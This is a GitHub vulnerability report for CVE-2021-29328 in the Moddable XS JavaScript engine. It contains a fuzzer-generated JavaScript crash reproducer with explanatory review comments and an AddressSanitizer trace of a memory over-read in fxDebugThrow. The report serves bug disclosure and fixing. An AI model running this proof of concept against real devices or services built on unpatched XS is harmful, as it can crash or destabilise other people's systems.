
CVE-2021-29328: over access(fxEnvironmentGetProperty) · Issue #585 · Moddable-OpenSource/moddable

OpenSource Moddable v10.5.0 was discovered to contain a buffer over-read in the fxDebugThrow function at /moddable/xs/sources/xsDebug.c.

operating system: ubuntu18.04
compile command:  cd /pathto/moddable/xs/makefiles/lin
make
test command: ./xst poc


/**
 * Helper from the crash reproducer; the code looks machine-generated
 * (presumably fuzzer output), so names do not describe behaviour.
 *
 * Despite its name, it builds and returns an empty plain object. The locals
 * nEmw, oob, j and protoWithIndexedAccessors are assigned but never read.
 *
 * @returns {Object} `obj`, after an Object.assign whose source is an empty
 *   String wrapper and therefore contributes no properties.
 */
function getHiddenValue() {
    var obj = {};
    var nEmw = new RegExp(null);
    var oob = 'value';
    // `str` is hoisted but still undefined here, so eval() receives a
    // non-string value and hands it back without evaluating any source text.
    var fun = eval(str);
    nEmw = new Object();
    // The target is the primitive '0' and the source a Number wrapper; the result is unused.
    oob = Object.assign('0', Object(521));
    var str = 'new String(\'\')';
    // From here on eval(str) evaluates the literal above and yields an empty String object.
    var fun = eval(str);
    // Function-local binding: it shadows the top-level `let` of the same name
    // only inside getHiddenValue and is never read.
    let protoWithIndexedAccessors = {};
    var j = [];
    // `fun` is an empty String wrapper at this point, so `obj` stays empty.
    Object.assign(obj, fun);
    var fun = eval(str);
    return obj;
}
/**
 * Main function of the crash reproducer; the code looks machine-generated
 * (presumably fuzzer output), so names do not describe behaviour.
 *
 * It declares no parameters, so the arguments passed by the recursive call
 * inside helper() are ignored.
 *
 * NOTE(review): the nested helper() reads `protoWithIndexedAccessors`, which is
 * declared neither here nor in helper(), so it resolves to the `let` on the
 * script's last line. On the first top-level call that binding is still
 * uninitialized, so a conforming engine is expected to raise a ReferenceError
 * at that read. This is presumably the throw seen in the report's stack
 * (fxEnvironmentGetProperty -> fxThrowMessage -> fxDebugThrow) -- confirm
 * against the upstream issue.
 *
 * @returns {*} the value produced by helper(), if control ever gets that far.
 */
function makeOobString() {
    var hiddenValue = getHiddenValue();
    var str = 'constructor';
    var extern_arr_vars = [];
    let i = 0;
    var ijjkkk = 0;
    // `str` is overwritten with the boolean result of the comparison (true).
    str = ijjkkk < 100000;
    function helper(i) {
        let a = new Array();
        var extern_arr_vars = [];
        // `ijjkkk` is the enclosing function's variable (0 on the first pass).
        if (ijjkkk < 100000) {
            // The arguments are evaluated before the call is made, so the read
            // of `protoWithIndexedAccessors` comes before any recursion.
            makeOobString(a, protoWithIndexedAccessors);
        }
        return a;
        // Unreachable statement; only the `var` declaration is hoisted.
        var oobString = makeOobString();
    }
    var j = [];
    // `str` is a boolean here, so eval() returns it unchanged.
    var fun = eval(str);
    // Object() ignores its second argument and the result is discarded.
    Object(fun, hiddenValue);
    var oobString = helper();
    // Redeclares the function-scoped `ijjkkk`. The loop body recurses with no
    // base case; it is not expected to be reached if helper() throws first.
    for (var ijjkkk = 0; ijjkkk < 100000; ++ijjkkk) {
        fun = makeOobString();
    }
    return oobString;
}
// Top-level driver of the reproducer. The first call below runs while the
// `let` on the last line is still uninitialized.
var oobString = makeOobString();
var oobString = makeOobString();
// `helper` is declared only inside makeOobString and is not in scope here.
helper(oobString);
// Declared last on purpose or by accident of generation: reads of this binding
// made while the calls above run hit it before initialization (temporal dead zone).
let protoWithIndexedAccessors = {};


ASAN:SIGSEGV
=================================================================
==5974==ERROR: AddressSanitizer: SEGV on unknown address 0x7f3b90c5ec8a (pc 0x0000004cbf37 bp 0x7ffe0703b1f0 sp 0x7ffe0703b1c0 T0)
    #0 0x4cbf36 in fxDebugThrow /home/node/mmfuzzer/asan_moddable/moddable/xs/sources/xsDebug.c:784
    #1 0x42068e in fxThrowMessage /home/node/mmfuzzer/asan_moddable/moddable/xs/sources/xsAPI.c:1251
    #2 0x655dea in fxEnvironmentGetProperty /home/node/mmfuzzer/asan_moddable/moddable/xs/sources/xsType.c:1147
    #3 0x5d5e64 in fxRunID /home/node/mmfuzzer/asan_moddable/moddable/xs/sources/xsRun.c:2133
    #4 0x604ee7 in fxRunScript /home/node/mmfuzzer/asan_moddable/moddable/xs/sources/xsRun.c:4708
    #5 0x6fa9f9 in fxRunProgramFile /home/node/mmfuzzer/asan_moddable/moddable/xs/tools/xst.c:1369
    #6 0x6ed74c in main /home/node/mmfuzzer/asan_moddable/moddable/xs/tools/xst.c:270
    #7 0x7f4b855bd82f in __libc_start_main (/lib/x86_64-linux-gnu/libc.so.6+0x2082f)
    #8 0x4146a8 in _start (/root/AFL/targets/moddable/xst+0x4146a8)

AddressSanitizer can not provide additional info.
SUMMARY: AddressSanitizer: SEGV /home/node/mmfuzzer/asan_moddable/moddable/xs/sources/xsDebug.c:784 fxDebugThrow
==5974==ABORTING
